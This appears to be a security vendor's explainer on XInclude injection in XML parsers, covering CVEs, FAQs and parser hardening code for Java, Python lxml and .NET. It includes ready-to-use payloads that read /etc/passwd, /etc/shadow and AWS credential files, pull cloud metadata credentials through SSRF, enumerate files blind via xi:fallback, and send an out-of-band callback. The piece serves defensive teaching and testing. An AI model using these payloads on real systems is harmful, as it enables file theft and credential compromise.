XInclude injection uses W3C XInclude elements to include files or URLs in XML documents without needing DOCTYPE, bypassing filters that only block classic XXE patterns.
TL;DR
<xi:include> elements, bypassing filters checking for <!DOCTYPE<xi:include parse="text" href="file:///etc/passwd"/> reads files just like classic XXE, via a different mechanismsetXIncludeAware(false) in Javahref="http://169.254.169.254/" works via XInclude just like XXE SSRFXInclude (XML Inclusions, W3C standard) is a document composition mechanism that allows XML documents to include content from other files or URLs using namespace-qualified XML elements rather than DTD entity declarations. When an XML processor encounters <xi:include href="file:///etc/passwd" parse="text"/>, it fetches the specified URI and substitutes the element with the retrieved content — the same effect as classic XXE file disclosure, achieved through an entirely different mechanism.
XInclude injection (CWE-827: Improper Control of Document Type Definition) applies when an attacker can inject XML content into a body position — element content, request body — but cannot control the DOCTYPE. It directly bypasses the most common XXE hardening pattern: disabling DOCTYPE processing. An application that blocks <!DOCTYPE declarations while leaving XInclude processing enabled is vulnerable to file disclosure and SSRF via the XInclude vector.
OWASP A05:2021 (Security Misconfiguration) applies because disabling XInclude is a separate parser setting from disabling DOCTYPE entities, and most hardening documentation focuses exclusively on the DOCTYPE vector. CVE-2025-31200 confirmed this defense gap in LibreOffice (CVSS 7.1): the document processor had DOCTYPE-based XXE blocked but still processed XInclude instructions, leading to file disclosure when malicious ODT files were opened.
The attack requires no DOCTYPE declaration. The payload is a pure XML element:
<!-- No DOCTYPE — bypasses DOCTYPE-checking filters entirely -->
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>When embedded in an application's expected XML schema:
POST /api/order/validate HTTP/1.1
Host: app.example.com
Content-Type: application/xml
<order xmlns:xi="http://www.w3.org/2001/XInclude">
<productId>
<xi:include parse="text" href="file:///etc/passwd"/>
</productId>
<quantity>1</quantity>
</order>HTTP/1.1 200 OK
{"productId": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...", "quantity": 1}<!-- Linux sensitive files -->
<xi:include parse="text" href="file:///etc/passwd"/>
<xi:include parse="text" href="file:///etc/shadow"/>
<xi:include parse="text" href="/proc/self/environ"/>
<xi:include parse="text" href="file:///var/www/html/wp-config.php"/>
<xi:include parse="text" href="file:///home/app/.aws/credentials"/>
<!-- Windows sensitive files -->
<xi:include parse="text" href="file:///C:/Windows/System32/drivers/etc/hosts"/>
<xi:include parse="text" href="file:///C:/inetpub/wwwroot/web.config"/><!-- Cloud metadata (same targets as classic XXE SSRF) -->
<xi:include parse="text" href="http://169.254.169.254/latest/meta-data/iam/security-credentials/"/>
<!-- GCP metadata -->
<xi:include parse="text" href="http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"/>
<!-- Internal services -->
<xi:include parse="text" href="http://127.0.0.1:6379/"/><root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/app-secret.key">
<xi:fallback>FILE_NOT_FOUND</xi:fallback>
</xi:include>
</root>If the response contains FILE_NOT_FOUND, the file does not exist. If it contains other content, the file was read. This enables blind file existence enumeration without OOB infrastructure.
<!-- Include another XML file as a subtree -->
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="xml" href="file:///etc/xml/catalog"/>
</root>This includes the target file as parsed XML, merging it into the document tree. Only works if the target is valid XML. Useful for reading Spring application context XML files, Maven POM files, and other XML configuration.
CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)
LibreOffice implemented blocking for DOCTYPE-based XXE in ODT processing. However, the XInclude processing path was left enabled. An ODT file with an XInclude element pointing to file:///etc/passwd disclosed the file when a user opened or converted the document. This CVE affects LibreOffice in document processing pipelines — automated conversion services, email attachment processors, and document management systems. Patched in LibreOffice 25.2.3 and 24.8.7.
LibreOffice-class applications using Apache FOP (XSL-FO to PDF converter) were also confirmed vulnerable to XInclude injection in SVG content passed to the FOP processor, as Apache FOP supports XInclude by default in its XML processing pipeline.
CVE-2025-66516 — Apache Tika (XInclude component)
Beyond the XFA XXE vector, Apache Tika's document processing pipeline included XInclude-aware parsers for certain document types. OOB callbacks confirmed XInclude processing in addition to the primary XFA entity vector before the 3.2.2 patch.
HackerOne #293795 — Uberflip (XInclude escalation)
After confirming standard XXE, the researcher tested XInclude to verify it was also unprotected. The application's XML schema validator did not recognize xi:include elements as suspicious. Both attack vectors were confirmed independently. This illustrates that applications often have multiple simultaneous XXE surface areas.
If DOCTYPE-based XXE probes are blocked (400 with "DOCTYPE not allowed"), escalate to XInclude:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://YOUR-TOKEN.oast.pro/xinclude-test"/>
</root>Embed xi:include inside the application's expected document structure:
<!-- For an order API expecting <order><productId>...</productId></order> -->
<order xmlns:xi="http://www.w3.org/2001/XInclude">
<productId><xi:include parse="text" href="file:///proc/version"/></productId>
</order>Test file existence via xi:fallback:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/app.conf">
<xi:fallback>NOT_FOUND</xi:fallback>
</xi:include>
</root>Test SSRF via XInclude with cloud metadata endpoint.
Burp Suite Pro does not automatically test XInclude by default — custom payloads are required. Add <xi:include> payloads to the active scanner's custom insertion points.
Semgrep rule java.lang.security.audit.xxe includes checks for setXIncludeAware(true) and alerts on XInclude enablement.
BreachVex runs a dedicated XInclude probe after its standard XXE probing, using xi:include with out-of-band callback tokens. This probe runs independently of DOCTYPE-based probes and is triggered when DOCTYPE probes fail.
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Block DOCTYPE (blocks classic XXE)
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// ALSO disable XInclude — separate setting
dbf.setXIncludeAware(false); // critical — not implied by DOCTYPE disabling
DocumentBuilder db = dbf.newDocumentBuilder();// SAXParserFactory — same pattern
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setXIncludeAware(false); // must be explicit
SAXParser sp = spf.newSAXParser();from lxml import etree
# VULNERABLE — calling xinclude() on untrusted content
parser = etree.XMLParser(resolve_entities=False)
tree = etree.fromstring(xml_bytes, parser=parser)
tree.xinclude() # processes xi:include even with resolve_entities=False
# SAFE — never call xinclude() on untrusted content
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False,
)
tree = etree.fromstring(xml_bytes, parser=parser)
# Do NOT call tree.xinclude() on attacker-controlled content// .NET XmlReader — XInclude not natively supported
// If using XInclude via third-party library (MVPXML, SaxonCS), ensure
// external file access is restricted:
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null // also prevents XInclude external resource fetching
};Defense gap pattern: Many hardening guides instruct developers to disable DOCTYPE processing and consider XXE fixed. XInclude is a separate W3C standard using a different code path. CVE-2025-31200 (LibreOffice) and the Batik/FOP attack surface demonstrate that blocking DOCTYPE while leaving XInclude enabled leaves a complete alternative file-read vector active. Always configure both.
XInclude (XML Inclusions) is a W3C standard that allows XML documents to compose themselves by including content from other files or URLs using xi:include elements. Unlike external DTD entities, XInclude does not require a DOCTYPE declaration — it uses namespace-qualified XML elements. When an application processes XML containing xi:include href='file:///etc/passwd' parse='text', the XML processor fetches and inlines the file content. An attacker who can inject XML content (but not control the DOCTYPE) can use XInclude to read files.
Classic XXE requires a DOCTYPE declaration and external entity definitions: <!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file://...'>]>. XInclude uses XML elements in the document body: <xi:include xmlns:xi='http://www.w3.org/2001/XInclude' parse='text' href='file:///etc/passwd'/>. No DOCTYPE is needed. This bypasses defenses that check for <!DOCTYPE in input or that disable DOCTYPE processing while leaving XInclude enabled. CWE-827 (Improper Control of Document Type Definition) covers XInclude, distinct from CWE-611 for classic XXE.
XInclude injection applies when: (1) the attacker can inject XML into a body position (element content, attribute value) but cannot control the document's DOCTYPE; (2) the application blocks DOCTYPE declarations but processes XInclude; (3) the parser has DOCTYPE disabled but XInclude awareness enabled (common — they are separate settings). Classic XXE applies when the attacker controls the full XML document including the DOCTYPE. In practice, many hardening guides focus only on DOCTYPE and forget XInclude.
CVE-2025-31200 (LibreOffice ODT, CVSS 7.1) is the clearest recent example. LibreOffice rejected DOCTYPE-based XXE payloads in ODT files but still processed XInclude instructions in the document XML. An ODT with xi:include href='file:///etc/passwd' parse='text' disclosed the file when the document was opened or converted. Patched in LibreOffice 25.2.3 and 24.8.7. This CVE demonstrates the 'defense gap': hardening against one technique without covering the related one.
xi:include has two modes: parse='text' reads the target file as plain text and includes it as a text node — this works for any file including binary content (though binary may cause encoding issues). parse='xml' fetches and parses the target as an XML document, then merges it into the including document's tree. For file disclosure, parse='text' is more reliable because it reads the raw file content without XML parsing. parse='xml' only works if the target file is valid XML.
Yes. xi:include href='http://internal-service/' parse='text' makes the XML processor issue an HTTP request to the specified URL and includes the response as text content. This is the same SSRF-via-XML mechanism as classic XXE's http:// SYSTEM entity, but implemented via XInclude. The SSRF targets are identical: AWS IMDS, internal APIs, Kubernetes API server, Redis. The XInclude SSRF is triggered even on parsers that have DOCTYPE-based external entities disabled.
If DOCTYPE-based entity probes return 400 with 'DOCTYPE not allowed', try XInclude: submit <root xmlns:xi='http://www.w3.org/2001/XInclude'><xi:include parse='text' href='file:///etc/passwd'/></root>. If the endpoint processes your XML body content (you control element content), embed the xi:include as a child element. If file contents appear in the response or an OOB callback fires, XInclude is enabled and unprotected.
No. DOCTYPE processing and XInclude are controlled by separate parser settings. In Java JAXP: disabling DOCTYPE (setFeature disallow-doctype-decl=true) does NOT disable XInclude — you must also call setXIncludeAware(false). In lxml: setting load_dtd=False does not disable XInclude — use etree.XMLParser(load_dtd=False, no_network=True) plus avoid xinclude() calls. In libxml2: XML_PARSE_NOENT does not disable XML_PARSE_XINCLUDE. Both must be configured independently.
XInclude supports an xi:fallback element: if the primary xi:include href fails (file not found, network error), the content of xi:fallback is used instead. An attacker can use this for error-based file path enumeration: include a file expected to exist, and use fallback to detect when it doesn't. This enables blind path traversal to enumerate filesystem layout. Example: <xi:include href='file:///etc/app-secret.key'><xi:fallback>FILE_NOT_FOUND</xi:fallback></xi:include>.
Most standard XXE scanners (Burp Suite Pro, XXEinjector) do not automatically test XInclude. XInclude detection requires custom payloads. Semgrep rules for 'XInclude' and 'setXIncludeAware' detect configuration issues in Java code. Manual testing remains the most reliable approach: submit xi:include payloads with Interactsh tokens and monitor for OOB callbacks. BreachVex tests XInclude separately from its main XXE probing, using a dedicated XInclude probe that runs after DOCTYPE-based probes complete.
Java SAX/DOM parsers with setXIncludeAware(true) (not the default, but commonly set for DITA/DocBook processing). Python lxml when the tree is built and then xinclude() is called explicitly. libxslt when processing XSLT that uses the document() function with XInclude-processed sources. LibreOffice document processors (pre-patch CVE-2025-31200). Apache Batik SVG renderer (SVG 1.1 supports XLink, which overlaps with XInclude processing). Apache FOP (XSL-FO to PDF processor).